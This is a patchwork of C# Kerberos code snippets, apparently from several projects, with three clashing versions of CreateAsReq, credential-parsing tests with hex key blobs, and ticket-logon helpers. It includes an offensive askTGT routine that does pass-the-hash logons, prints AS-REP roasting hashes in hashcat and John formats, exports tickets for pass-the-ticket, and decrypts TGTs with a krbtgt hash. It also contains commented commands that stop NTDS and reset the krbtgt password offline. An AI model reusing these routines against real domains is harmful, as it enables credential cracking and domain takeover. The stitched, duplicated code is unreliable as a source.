public static KrbAsReq CreateAsReq(KerberosCredential credential, AuthenticationOptions options)
{
var kdcOptions = (KdcOptions)(options & ~AuthenticationOptions.AllAuthentication);
var hostAddress = Environment.MachineName;
var pacRequest = new KrbPaPacRequest
{
IncludePac = options.HasFlag(AuthenticationOptions.IncludePacRequest)
};
var padata = new List <KrbPaData>()
{
new KrbPaData
{
Type = PaDataType.PA_PAC_REQUEST,
Value = pacRequest.Encode()
}
};
var asreq = new KrbAsReq()
{
MessageType = MessageType.KRB_AS_REQ,
Body = new KrbKdcReqBody
{
Addresses = new[] {
new KrbHostAddress {
AddressType = AddressType.NetBios,
Address = Encoding.ASCII.GetBytes(hostAddress.PadRight(16, ' '))
}
},
CName = KrbPrincipalName.FromString(
credential.UserName,
PrincipalNameType.NT_ENTERPRISE,
credential.Domain
),
EType = KerberosConstants.ETypes.ToArray(),
KdcOptions = kdcOptions,
Nonce = KerberosConstants.GetNonce(),
RTime = KerberosConstants.EndOfTime,
Realm = credential.Domain,
SName = new KrbPrincipalName
{
Type = PrincipalNameType.NT_SRV_INST,
Name = new[] { "krbtgt", credential.Domain }
},
Till = KerberosConstants.EndOfTime
},
PaData = padata.ToArray()
};
if (options.HasFlag(AuthenticationOptions.PreAuthenticate))
{
credential.TransformKdcReq(asreq);
}
return(asreq);
}
public static KrbAsReq CreateAsReq(KerberosCredential credential, AuthenticationOptions options)
{
if (credential == null)
{
throw new ArgumentNullException(nameof(credential));
}
var config = credential.Configuration ?? Krb5Config.Default();
var kdcOptions = (KdcOptions)(options & ~AuthenticationOptions.AllAuthentication);
var pacRequest = new KrbPaPacRequest
{
IncludePac = options.HasFlag(AuthenticationOptions.IncludePacRequest)
};
var padata = new List <KrbPaData>()
{
new KrbPaData
{
Type = PaDataType.PA_PAC_REQUEST,
Value = pacRequest.Encode()
}
};
var asreq = new KrbAsReq()
{
Body = new KrbKdcReqBody
{
Addresses = IncludeAddresses(config),
CName = ExtractCName(credential),
EType = GetPreferredETypes(config.Defaults.DefaultTicketEncTypes, config.Defaults.AllowWeakCrypto).ToArray(),
KdcOptions = kdcOptions,
Nonce = GetNonce(),
RTime = CalculateRenewTime(kdcOptions, config),
Realm = credential.Domain,
SName = new KrbPrincipalName
{
Type = PrincipalNameType.NT_SRV_INST,
Name = new[] { "krbtgt", credential.Domain }
},
Till = CalculateExpirationTime(config)
},
PaData = padata.ToArray()
};
if (options.HasFlag(AuthenticationOptions.PreAuthenticate))
{
credential.TransformKdcReq(asreq);
}
return(asreq);
}
private static KrbPrincipalName ExtractCName(KerberosCredential credential)
{
var principalName = KrbPrincipalName.FromString(credential.UserName);
if (principalName.IsServiceName)
{
return(principalName);
}
return(KrbPrincipalName.FromString(
credential.UserName,
PrincipalNameType.NT_ENTERPRISE,
credential.Domain
));
}
public void KerberosCredential_W2k3_Vector1()
{
byte[] blob = "030000000200000030003000500000000000000000000000030000000800000080000000000000000000000001000000080000008800000000000000000000000000000000000000000000000000000043004f004e0054004f0053004f002e0043004f004d00410064006d0069006e006900730074007200610074006f007200aed02c52204ca2ceaed02c52204ca2ce00000000000000000000000000000000".HexToBinary();
var credential = new KerberosCredential(blob);
// Check that the structure has been parsed correctly.
Assert.AreEqual("CONTOSO.COMAdministrator", credential.DefaultSalt);
Assert.AreEqual(2, credential.Credentials.Length);
Assert.AreEqual(KerberosKeyType.DES_CBC_MD5, credential.Credentials[0].KeyType);
// Serialize the structure
byte[] newBlob = credential.ToByteArray();
// Note that we are not expecting binary equality, because Windows Server 2003 used to add some redundand padding to the end of the structure.
Assert.AreEqual(blob.Length - 20, newBlob.Length);
}
public void KerberosCredential_W2k3_Vector2()
{
byte[] blob = "03000000020002004a004a007800000000000000000000000300000008000000c200000000000000000000000100000008000000ca00000000000000000000000300000008000000d200000000000000000000000100000008000000da00000000000000000000000000000000000000000000000000000043004f004e0054004f0053004f002e0043004f004d0068006f0073007400770069006e0032006b00330072003200650065002e0063006f006e0074006f0073006f002e0063006f006d00d9b33eb064e385dfd9b33eb064e385dff191e9a7b561525df191e9a7b561525d00000000000000000000000000000000".HexToBinary();
var credential = new KerberosCredential(blob);
// Check that the structure has been parsed correctly.
Assert.AreEqual("CONTOSO.COMhostwin2k3r2ee.contoso.com", credential.DefaultSalt);
Assert.AreEqual(2, credential.Credentials.Length);
Assert.AreEqual(KerberosKeyType.DES_CBC_MD5, credential.Credentials[0].KeyType);
Assert.AreEqual(2, credential.OldCredentials.Length);
// Serialize the structure
byte[] newBlob = credential.ToByteArray();
// Note that we are not expecting binary equality, because Windows Server 2003 used to add some redundand padding to the end of the structure.
Assert.AreEqual(blob.Length - 20, newBlob.Length);
}
public void KerberosCredential_Vector1()
{
byte[] blob = "0300000001000000200020003800000000000000000000000300000008000000580000000000000000000000000000000000000000000000410044004100540055004d002e0043004f004d0075007300650072003000320013f8fd37d557a401".HexToBinary();
var credential = new KerberosCredential(blob);
// Serialize the structure
byte[] newBlob = credential.ToByteArray();
// Try to parse it again
var newCredential = new KerberosCredential(newBlob);
// Check that we have the same key material
Assert.AreEqual(credential.DefaultSalt, newCredential.DefaultSalt);
Assert.AreEqual(credential.Credentials[0].ToString(), newCredential.Credentials[0].ToString());
// Check binary equality
Assert.AreEqual(blob.ToHex(), newBlob.ToHex());
}
public void KerberosCredential_Vector3()
{
byte[] blob = "0300000001000100400040004c000000000000000000000003000000080000008c00000000000000000000000300000008000000940000000000000000000000000000000000000000000000410044004100540055004d002e0043004f004d0068006f00730074006c006f006e002d006400630031002e00610064006100740075006d002e0063006f006d007091ce8545613d31a4cd57ea0b3d404a".HexToBinary();
var credential = new KerberosCredential(blob);
// Serialize the structure
byte[] newBlob = credential.ToByteArray();
// Try to parse it again
var newCredential = new KerberosCredential(newBlob);
// Check that we have the same key material
Assert.AreEqual(credential.DefaultSalt, newCredential.DefaultSalt);
Assert.AreEqual(credential.Credentials[0].ToString(), newCredential.Credentials[0].ToString());
// Check binary equality
Assert.AreEqual(blob.ToHex(), newBlob.ToHex());
}
public static async Task <PingResult> Ping(KerberosCredential credential, Krb5Config config, ILoggerFactory logger = null)
{
credential.Configuration = config;
var asReqMessage = KrbAsReq.CreateAsReq(credential, AuthenticationOptions.Renewable);
var asReq = asReqMessage.EncodeApplication();
var transport = new KerberosTransportSelector(
new IKerberosTransport[]
{
new TcpKerberosTransport(logger),
new UdpKerberosTransport(logger),
new HttpsKerberosTransport(logger)
},
config,
logger
)
{
ConnectTimeout = TimeSpan.FromSeconds(5)
};
var result = new PingResult {
AsReq = asReqMessage
};
try
{
result.AsRep = await transport.SendMessage <KrbAsRep>(credential.Domain, asReq);
}
catch (KerberosProtocolException pex)
{
result.Error = pex.Error;
}
return(result);
}
public static KrbAsReq CreateAsReq(KerberosCredential credential, AuthenticationOptions options)
{
var kdcOptions = (KdcOptions)(options & ~AuthenticationOptions.AllAuthentication);
var hostAddress = Environment.MachineName;
var padata = new List <KrbPaData>()
{
new KrbPaData
{
Type = PaDataType.PA_PAC_REQUEST,
Value = new KrbPaPacRequest
{
IncludePac = options.HasFlag(AuthenticationOptions.IncludePacRequest)
}.Encode().AsMemory()
}
};
if (options.HasFlag(AuthenticationOptions.PreAuthenticate))
{
KerberosConstants.Now(out DateTimeOffset timestamp, out int usec);
var ts = new KrbPaEncTsEnc
{
PaTimestamp = timestamp,
PaUSec = usec
};
var tsEncoded = ts.Encode().AsMemory();
KrbEncryptedData encData = KrbEncryptedData.Encrypt(
tsEncoded,
credential.CreateKey(),
KeyUsage.PaEncTs
);
padata.Add(new KrbPaData
{
Type = PaDataType.PA_ENC_TIMESTAMP,
Value = encData.Encode().AsMemory()
});
}
var asreq = new KrbAsReq()
{
MessageType = MessageType.KRB_AS_REQ,
Body = new KrbKdcReqBody
{
Addresses = new[] {
new KrbHostAddress {
AddressType = AddressType.NetBios,
Address = Encoding.ASCII.GetBytes(hostAddress.PadRight(16, ' '))
}
},
CName = new KrbPrincipalName
{
Name = new[] { $"{credential.UserName}@{credential.Domain}" },
Type = PrincipalNameType.NT_ENTERPRISE
},
EType = KerberosConstants.ETypes.ToArray(),
KdcOptions = kdcOptions,
Nonce = KerberosConstants.GetNonce(),
RTime = KerberosConstants.EndOfTime,
Realm = credential.Domain,
SName = new KrbPrincipalName
{
Type = PrincipalNameType.NT_SRV_INST,
Name = new[] { "krbtgt", credential.Domain }
},
Till = KerberosConstants.EndOfTime
},
PaData = padata.ToArray()
};
return(asreq);
}
/// <summary>
/// Logon user using Kerberos Ticket.
/// </summary>
/// <param name="type">The type of logon token.</param>
/// <param name="service_ticket">The service ticket.</param>
/// <param name="tgt_ticket">Optional TGT.</param>
/// <returns>The logged on token.</returns>
public static NtToken LsaLogonTicket(SecurityLogonType type, KerberosTicket service_ticket, KerberosCredential tgt_ticket)
{
return(LsaLogonTicket(type, service_ticket, tgt_ticket, true).Result);
}
/// <summary>
/// Logon user using Kerberos Ticket.
/// </summary>
/// <param name="type">The type of logon token.</param>
/// <param name="service_ticket">The service ticket.</param>
/// <param name="tgt_ticket">Optional TGT.</param>
/// <param name="throw_on_error">True to throw on error.</param>
/// <returns>The logged on token.</returns>
public static NtResult <NtToken> LsaLogonTicket(SecurityLogonType type, KerberosTicket service_ticket, KerberosCredential tgt_ticket, bool throw_on_error)
{
if (service_ticket is null)
{
throw new ArgumentNullException(nameof(service_ticket));
}
return(LsaLogonTicket(type, service_ticket.TicketData, tgt_ticket?.ToArray(), throw_on_error));
}
//askTGT
public static async System.Threading.Tasks.Task <KrbAsRep> askTGT(string kdc,
ILoggerFactory logger,
TcpKerberosTransport transport,
string username,
string password,
string domainName,
bool outKirbi = false,
bool verbose = false,
string format = "hashcat",
bool asreproast = false,
bool ptt = false,
string hash = null,
EncryptionType etype = EncryptionType.RC4_HMAC_NT,
bool outfile = false,
string tgtHash = null,
EncryptionType tgtEtype = EncryptionType.AES256_CTS_HMAC_SHA1_96
)
{
var now = DateTime.Now;
Console.WriteLine("[*] Starting Kerberos Authentication ...");
if (password != null)
{
cred = new KerberosPasswordCredential(username, password, domainName);
}
else
{
cred = new Utils.KerberosHashCreds(username, hash, etype, domainName);
}
credKey = cred.CreateKey();
//Pre-Auth
KrbAsReq asReqMessage = null;
KrbAsRep asRep = null;
bool notPreauth = true;
AuthenticationOptions authOptions =
AuthenticationOptions.IncludePacRequest |
AuthenticationOptions.RenewableOk |
AuthenticationOptions.Canonicalize |
AuthenticationOptions.Renewable |
AuthenticationOptions.Forwardable;
int authAttempt = 0;
while (notPreauth)
{
authAttempt += 1;
try
{
Console.WriteLine("[*] Sending AS-REQ ...");
var kdcOptions = (KdcOptions)(authOptions & ~AuthenticationOptions.AllAuthentication);
var hostAddress = Environment.MachineName;
var pacRequest = new KrbPaPacRequest
{
IncludePac = authOptions.HasFlag(AuthenticationOptions.IncludePacRequest)
};
var padata = new List <KrbPaData>()
{
new KrbPaData
{
Type = PaDataType.PA_PAC_REQUEST,
Value = pacRequest.Encode()
}
};
asReqMessage = new KrbAsReq()
{
Body = new KrbKdcReqBody
{
Addresses = new[]
{
new KrbHostAddress
{
AddressType = AddressType.NetBios,
Address = Encoding.ASCII.GetBytes(hostAddress.PadRight(16, ' '))
}
},
CName = new KrbPrincipalName()
{
Type = PrincipalNameType.NT_PRINCIPAL,
Name = new[] { username }// + "@" + domainName.ToUpper() }
},
//KrbPrincipalName.FromString(
// username,
// PrincipalNameType.NT_ENTERPRISE,
// domainName
//),
EType = KrbConstants.KerberosConstants.ETypes.ToArray(),//kdcReqEtype,
KdcOptions = kdcOptions,
Nonce = KrbConstants.KerberosConstants.GetNonce(),
RTime = KrbConstants.KerberosConstants.EndOfTime,
Realm = credKey.PrincipalName.Realm,
SName = new KrbPrincipalName
{
Type = PrincipalNameType.NT_SRV_INST,
Name = new[] { "krbtgt", credKey.PrincipalName.Realm }
},
Till = KrbConstants.KerberosConstants.EndOfTime
},
PaData = padata.ToArray()
};
if (authOptions.HasFlag(AuthenticationOptions.PreAuthenticate))
{
var ts = new KrbPaEncTsEnc()
{
PaTimestamp = now,
PaUSec = now.Millisecond,
};
var tsEncoded = ts.Encode();
var padataAs = asReqMessage.PaData.ToList();
KrbEncryptedData encData = KrbEncryptedData.Encrypt(
tsEncoded,
credKey,
KeyUsage.PaEncTs
);
padataAs.Add(new KrbPaData
{
Type = PaDataType.PA_ENC_TIMESTAMP,
Value = encData.Encode()
});
asReqMessage.PaData = padataAs.ToArray();
}
//AS-Req Part
if (verbose)
{
PrintFunc.PrintReq(asReqMessage, credKey);
}
var asReq = asReqMessage.EncodeApplication();
asRep = await transport.SendMessage <KrbAsRep>(
domainName,
asReq,
default(CancellationToken));
}
catch (KerberosProtocolException pex)
{
Console.WriteLine("[x] Kerberos Error: {0}", pex.Message);
if (pex?.Error?.ErrorCode == KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED)
{
if (asreproast)
{
Console.WriteLine("[x] Sorry the provided user requires PreAuth.\n");
Environment.Exit(0);
}
else
{
//Salt issue for RID 500 Built-in admin account
//https://github.com/dotnet/Kerberos.NET/issues/164
if (password != null)
{
cred = new KerberosPasswordCredential(username, password, domainName);
}
else
{
cred = new Utils.KerberosHashCreds(username, hash, etype, domainName);
}
cred.IncludePreAuthenticationHints(pex?.Error?.DecodePreAuthentication());
credKey = cred.CreateKey();
authOptions |= AuthenticationOptions.PreAuthenticate;
Console.WriteLine("[*] Adding encrypted timestamp ...");
}
}
else if (pex?.Error?.ErrorCode == KerberosErrorCode.KDC_ERR_PREAUTH_FAILED)
{
Console.WriteLine("[x] Invalid Credential! Authentication Stopped ...\n");
Environment.Exit(0);
}
else
{
Console.WriteLine("[x] Authentication Stopped ...\n");
Environment.Exit(0);
}
}
if (authAttempt == 2 || asreproast)
{
notPreauth = false;
}
}
Console.WriteLine("[*] Receiving AS-REP...");
if (asreproast)
{
//Asreproasting
string repHash = BitConverter.ToString(asRep.EncPart.Cipher.ToArray()).Replace("-", string.Empty);
repHash = repHash.Insert(32, "$");
string hashString = "";
if (format == "john")
{
hashString = String.Format("$krb5asrep${0}@{1}:{2}", username, domainName, repHash);
Console.WriteLine("[+] ASREPRoasting Hash: {0}", hashString);
}
else
{
hashString = String.Format("$krb5asrep$23${0}@{1}:{2}", username, domainName, repHash);
Console.WriteLine("[+] ASREPRoasting Hash: {0}", hashString);
}
}
else
{
try
{
KrbEncAsRepPart asDecryptedRepPart = cred.DecryptKdcRep(
asRep,
KeyUsage.EncAsRepPart,
d => KrbEncAsRepPart.DecodeApplication(d));
if (verbose)
{
//AS-Rep Part
PrintFunc.PrintRep(asRep, credKey);
if (authOptions.HasFlag(AuthenticationOptions.PreAuthenticate))
{
Console.WriteLine(" * [Decrypted Enc-Part]:");
PrintFunc.PrintRepEnc(asDecryptedRepPart, credKey);
////////////////////////////////////////decrypt TGT
//// net stop ntds
//// $key =Get-BootKey -Online
//// $cred = ConvertTo-SecureString -String "krbtgt" -AsPlainText -Force
//// Set-ADDBAccountPassword -SamAccountName krbtgt -NewPassword $cred -DatabasePath C:\Windows\NTDS\ntds.dit -BootKey $key
//// net start ntds
////KeyTable keytab = new KeyTable(System.IO.File.ReadAllBytes("C:\\Users\\Public\\krbtgt.keytab"));
////var krbtgtkey = keytab.GetKey(EncryptionType.AES256_CTS_HMAC_SHA1_96, asRep.Ticket.SName);
///
if (!string.IsNullOrEmpty(tgtHash))
{
var krbtgtCred = new Utils.KerberosHashCreds("krbtgt", tgtHash, tgtEtype);
//TGS - REQ Ticket Enc-Part
var ticketDecrypted = asRep.Ticket.EncryptedPart.Decrypt
(krbtgtCred.CreateKey(),
KeyUsage.Ticket,
b => KrbEncTicketPart.DecodeApplication(b));
Console.WriteLine(" * [Decrypted TGT]:");
PrintFunc.PrintTicketEnc(ticketDecrypted);
//Encrypt the ticket again
asRep.Ticket.EncryptedPart = KrbEncryptedData.Encrypt(ticketDecrypted.EncodeApplication(),
krbtgtCred.CreateKey(), KeyUsage.Ticket);
}
//////////////////////////////////////TGT
}
}
if (outKirbi || outfile)
{
var kirbiTGT = Kirbi.toKirbi(asRep, asDecryptedRepPart, ptt);
if (outKirbi)
{
Console.WriteLine("[+] TGT Kirbi:");
Console.WriteLine(" - {0}", Convert.ToBase64String(kirbiTGT));
}
if (outfile)
{
Utils.Utils.WriteBytesToFile(Utils.Utils.MakeTicketFileName(username), kirbiTGT);
}
}
}
catch (Exception e)
{
Console.WriteLine("[x] {0}. Unable to decrypt the ticket, provided credential is invalid. (Check the ticket etype if you want to decrypt it)\n", e.Message);
//Environment.Exit(0);
}
}
return((KrbAsRep)asRep);
}
public S4UProvider(KerberosClient client, KerberosCredential credential, DecryptedKrbApReq krbApReq)
{
this.client = client;
this.credential = credential;
this.krbApReq = krbApReq;
}
public S4UProviderFactory(string upn, KeyTable keytab, Krb5Config config = null, ILoggerFactory logger = null)
{
this.client = new KerberosClient(config, logger) { CacheInMemory = true };
this.credential = new KeytabCredential(upn, keytab);
}
